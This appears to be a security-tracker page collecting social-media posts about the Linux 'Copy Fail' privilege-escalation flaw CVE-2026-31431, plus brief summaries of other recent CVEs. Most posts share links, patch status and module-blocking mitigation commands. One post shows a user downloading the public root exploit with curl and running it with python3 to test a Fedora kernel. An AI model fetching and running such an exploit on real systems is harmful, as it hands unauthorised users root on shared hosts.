CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

copy.fail/

##

marshray at 2026-04-29T22:21:07.283Z ##

This is what I'm pasting into my own linux systems to implement the mitigation suggested at the website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb at 2026-04-29T22:15:16.659Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/


##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

security-tracker.debian.org/tr

##

cR0w at 2026-04-29T21:55:48.287Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne at 2026-04-29T21:46:01.476Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

newsyc300@toot.community at 2026-04-29T21:43:29.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hackernewsrobot@mastodon.social at 2026-04-29T21:37:14.000Z ##

Copy Fail – CVE-2026-31431 copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

security-tracker.debian.org/tr

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

github.com/theori-io/copy-fail

##

newsyc250@toot.community at 2026-04-29T21:03:31.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily at 2026-04-29T20:32:32.891Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily at 2026-04-29T20:31:18.159Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

newsyc200@toot.community at 2026-04-29T20:23:26.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

copy.fail

security-tracker.debian.org/tr

ubuntu.com/security/CVE-2026-3

suse.com/security/cve/CVE-2026

#copyfail

##

jcrabapple@dmv.community at 2026-04-30T11:50:41.000Z ##

Copy Fail — CVE-2026-31431

copy.fail/

##

CuratedHackerNews@mastodon.social at 2026-04-30T11:39:04.000Z ##

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

github.com/NorskHelsenett/copy

#github #k8s

##

Natanox@chaos.social at 2026-04-30T11:16:58.000Z ##

@yuka Debian is uncomfortably slow pushing the fix.
security-tracker.debian.org/tr

##

harld@masto.ai at 2026-04-30T11:04:20.000Z ##

Toch altijd wel knap wat hackers weten te vinden.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

copy.fail/

##

beyondmachines1@infosec.exchange at 2026-04-30T11:01:29.000Z ##

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

agresor@infosec.exchange at 2026-04-30T10:35:46.000Z ##

Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( nfsec.pl/security/6718 ) #linux #kernel #exploit

youtube.com/watch?v=-RuJTJga2fU

##

Atirut@toot.community at 2026-04-30T10:26:18.000Z ##

PSA for sysadmins: master.almalinux-org.pages.dev

TL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

##

egghat@mastodon.social at 2026-04-30T10:06:30.000Z ##

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 copy.fail/
#BadNews

##

decio@infosec.exchange at 2026-04-30T09:59:10.000Z ##

[VULN] ⚠️"Copy Fail - Une IA trouve la faille Linux que personne n'a vue"
" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur à root en 732 octets, affectant la quasi-totalité des kernels non patchés depuis 2017, découverte par une IA en une heure.

  • La faille exploite une optimisation de 2017 dans le sous-système crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire système via l'appel splice().
  • Deux solutions de protection existent : patcher le kernel via la distro ou désactiver le module algif_aead (ou bloquer le sous-système crypto via seccomp si le module est intégré en dur)."👇 korben.info/copy-fail-faille-k

Demo / exploit ( via @bortzmeyer )
👇
bortzmeyer.org/copyfail.html

🔍
⬇️
vulnerability.circl.lu/vuln/CV

💬
⬇️
infosec.pub/post/45735124

#CyberVeille #CVE_2026_31431

##

pbloem@sigmoid.social at 2026-04-30T09:55:18.000Z ##

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

bugcrowd.com/blog/what-we-know

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

##

linux@activitypub.awakari.com at 2026-04-30T08:21:56.000Z ## В множество Linux дистрибуции е открита критична уязвимост: 732 байта код дават root-права на всеки Разработчицит...

#IT #Новини #Copy #Fail #CVE-2026-31431 #Linux #Python #root #Xint #Code #киберсигурност

Origin | Interest | Match ##

stuartl@longlandclan.id.au at 2026-04-30T09:00:48.000Z ##

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

bugs.gentoo.org/show_bug.cgi?i

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: security-tracker.debian.org/tr

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

##

SpaceLifeForm@infosec.exchange at 2026-04-30T07:32:55.000Z ##

I can confirm this report where Copyfail fails.

github.com/theori-io/copy-fail

#Debian #Copyfail

##

tisba@ruby.social at 2026-04-30T07:20:51.000Z ##

Copy Fail (copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to code.forgejo.org/forgejo/forge (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

##

isAutonomous@karlsruhe-social.de at 2026-04-30T07:08:34.000Z ##

@giggls Verdammt, ja. Das ist die richtige ID:
euvd.enisa.europa.eu/vulnerabi

Die Bezeichnungen bei den Europäern sind irritierend. Warum müssen die eigene Nummern vergeben?
"EUVD-2026-24639"

##

bws@social.linux.pizza at 2026-04-30T06:54:59.000Z ##

@fooflington ich bins grade.
security-tracker.debian.org/tr
Einfach mal nen poc (nicht überprüft) raushauen ohne responsible disclosure fürn maximalen fame um den eigenen KI scanner zu promoten.

##

chrispy@chaos.social at 2026-04-30T06:48:18.000Z ##

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

##

ligasser@social.epfl.ch at 2026-04-30T06:44:01.000Z ##

#linux #kernel #exploit - I completely missed this one:

bugcrowd.com/blog/what-we-know

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

##

rimu@piefed.social at 2026-04-30T06:37:44.933Z ##

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

##

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

poundquerydotinfo@virctuary.com at 2026-04-30T02:34:47.000Z ##

CopyFail results:

On Debian 12 (6.1.158 kernel) PoC didn't seem to work, I got prompted for a password.

On Debian 14 (6.18.5 kernel) got dropped right into a root prompt.

So this is very real. Yikes.

Proof of concept: github.com/theori-io/copy-fail

Write up: discourse.ifin.network/t/copy-

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

Origin | Interest | Match ##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py raw.githubusercontent.com/theo
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

yukotan.bsky.social@bsky.brid.gy at 2026-04-29T23:25:16.858Z ##

全てのディストリで影響があるゼロデイの脆弱性が見つかったそうです。特権昇格が可能です。 Copy Fail — CVE-2026-31431 copy.fail

Copy Fail — 732 Bytes to Root

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan@infosec.exchange at 2026-04-29T22:43:47.000Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

copy.fail/

##

marshray@infosec.exchange at 2026-04-29T22:21:07.000Z ##

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb@infosec.exchange at 2026-04-29T22:15:16.000Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

security-tracker.debian.org/tr

##

cR0w@infosec.exchange at 2026-04-29T21:55:48.000Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne@infosec.exchange at 2026-04-29T21:46:01.000Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

security-tracker.debian.org/tr

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

github.com/theori-io/copy-fail

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

Origin | Interest | Match ##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily@infosec.exchange at 2026-04-29T20:32:32.000Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily@infosec.exchange at 2026-04-29T20:31:18.000Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

copy.fail

security-tracker.debian.org/tr

ubuntu.com/security/CVE-2026-3

suse.com/security/cve/CVE-2026

#copyfail

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

xint.io/blog/copy-fail-linux-d

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
news.ycombinator.com/item?id=4

#hackernews #tech

##

giggls@karlsruhe-social.de at 2026-04-29T19:17:23.000Z ##

Hm security-tracker.debian.org/tr

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: copy.fail/
Comments: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

CVE-2026-39457(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

When exchanging data over a socket, libnv uses select(2) to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select(2)'s file descriptor set size limit of FD_SETSIZE (1024). An attacker who is able to force a libnv application to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to cl

CVE-2026-7270(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

An operator precedence bug in the kernel results in a scenario where a buffer overflow causes attacker-controlled data to overwrite adjacent execve(2) argument buffers. The bug may be exploitable by an unprivileged user to obtain superuser privileges.

grahamperrin@bsd.cafe at 2026-04-30T04:29:15.000Z ##

RE: mastodon.bsd.cafe/@grahamperri

3/

CVE-2026-7270 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:13.exec <security.freebsd.org/advisorie> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <blog.calif.io/p/mad-bugs-claud>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

##

grahamperrin@bsd.cafe at 2026-04-30T04:29:15.000Z ##

RE: mastodon.bsd.cafe/@grahamperri

3/

CVE-2026-7270 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:13.exec <security.freebsd.org/advisorie> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <blog.calif.io/p/mad-bugs-claud>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

##

CVE-2026-7164(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

Incorrect packet validation allowed unbounded recursion parsing SCTP chunk parameters. This can eventually result in a stack overflow and panic. Remote attackers can craft packets which cause affected systems to panic. This affects any system where pf is configured to process traffic, independent of the configured ruleset.

grahamperrin@bsd.cafe at 2026-04-30T04:20:15.000Z ##

2/

CVE-2026-7164 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:14.pf <security.freebsd.org/advisorie> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

##

grahamperrin@bsd.cafe at 2026-04-30T04:20:15.000Z ##

2/

CVE-2026-7164 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:14.pf <security.freebsd.org/advisorie> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

##

CVE-2026-5402
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T09:30:31

2 posts

TLS protocol dissector heap overflow in Wireshark 4.6.0 to 4.6.4 allows denial of service and possible code execution

offseq at 2026-04-30T07:30:28.032Z ##

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T07:30:28.000Z ##

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. radar.offseq.com/threat/cve-20 #OffSeq #Wireshark #CVE20265402 #BlueTeam

##

CVE-2026-42511(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:31

2 posts

The BOOTP file field is written to the lease file without escaping embedded double-quotes, allowing injection of arbitrary dhclient.conf directives. When the lease file is subsequently re-parsed by dhclient, e.g., after a system restart, an attacker-controlled field from the lease is passed to dhclient-script(8), which evaluates it. A rogue DHCP server may be able to execute arbirary code as roo

CVE-2026-42512
(0 None)

EPSS: 0.00%

updated 2026-04-30T09:16:03.373000

2 posts

As dhclient is building an environment to pass to dhclient-script, it may need to resize the array of string pointers. The code which expands the array incorrectly calculates its new size when requesting memory, resulting in a heap buffer overrun. A specially crafted packet can cause dhclient to overrun its buffer of environment entries. This can result in a crash, but it may be possible to lev

CVE-2026-35547
(0 None)

EPSS: 0.00%

updated 2026-04-30T09:16:03.167000

2 posts

When processing the header of an incoming message, libnv failed to properly validate the message size. The lack of validation allows a malicious program to write outside the bounds of a heap allocation. This can trigger a crash or system panic, and it may be possible for an unprivileged user to exploit the bug to elevate their privileges.

CVE-2026-5201
(7.5 HIGH)

EPSS: 0.09%

updated 2026-04-30T08:16:07.410000

1 posts

A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of servi

1 repos

https://github.com/kagancapar/CVE-2026-5201

linux@activitypub.awakari.com at 2026-04-28T03:12:25.000Z ## Oracle Linux 9 gdk-pixbuf2 Important Fix ELSA-2026-10708 CVE-2026-5201 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-7470
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T03:16:01.740000

2 posts

A flaw has been found in Tenda 4G300 US_4G300V1.0Mt_V1.01.42_CN_TDC01. Affected is the function sub_427C3C of the file /goform/SafeMacFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used.

offseq at 2026-04-30T06:00:27.641Z ##

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T06:00:27.000Z ##

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #Tenda #RouterSecurity

##

barubary at 2026-04-30T10:22:34.106Z ##

RE: social.bund.de/@certbund/11649

labs.watchtowr.com/the-interne

##

jorijn@toot.community at 2026-04-30T05:43:39.000Z ##

An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.

This one is ugly, folks. Go update your servers now, and run the detection script.

support.cpanel.net/hc/en-us/ar

#Webhosting #cPanel #WHM

##

offseq at 2026-04-30T01:30:29.611Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. radar.offseq.com/threat/cve-20

##

campuscodi@mastodon.social at 2026-04-30T00:20:04.000Z ##

Major authentication bypass disclosed in cPanel

support.cpanel.net/hc/en-us/ar

##

thehackerwire@mastodon.social at 2026-04-29T23:42:10.000Z ##

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AlesandroOrtiz at 2026-04-29T22:32:03.430Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

barubary@infosec.exchange at 2026-04-30T10:22:34.000Z ##

RE: social.bund.de/@certbund/11649

labs.watchtowr.com/the-interne

#cPanel #exploit

##

jorijn@toot.community at 2026-04-30T05:43:39.000Z ##

An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.

This one is ugly, folks. Go update your servers now, and run the detection script.

support.cpanel.net/hc/en-us/ar

#Webhosting #cPanel #WHM

##

offseq@infosec.exchange at 2026-04-30T01:30:29.000Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #cPanel #Vulnerability #Infosec

##

campuscodi@mastodon.social at 2026-04-30T00:20:04.000Z ##

Major authentication bypass disclosed in cPanel

support.cpanel.net/hc/en-us/ar

##

thehackerwire@mastodon.social at 2026-04-29T23:42:10.000Z ##

🔴 CVE-2026-41940 - Critical (9.8)

cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized acc...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AlesandroOrtiz@infosec.exchange at 2026-04-29T22:32:03.000Z ##

@mttaggart Detailed analysis by Watchtowr: labs.watchtowr.com/the-interne

##

threatcodex@infosec.exchange at 2026-04-29T18:11:35.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
labs.watchtowr.com/the-interne

##

_r_netsec@infosec.exchange at 2026-04-29T17:28:05.000Z ##

The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs labs.watchtowr.com/the-interne

##

CVE-2026-7420
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T00:31:28

2 posts

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-29T23:41:10.000Z ##

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:41:10.000Z ##

🟠 CVE-2026-7420 - High (8.8)

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be execu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7419
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T00:31:28

2 posts

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-29T23:40:59.000Z ##

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-29T23:40:59.000Z ##

🟠 CVE-2026-7419 - High (8.8)

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation o...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7424
(8.1 HIGH)

EPSS: 0.00%

updated 2026-04-29T23:16:20.367000

2 posts

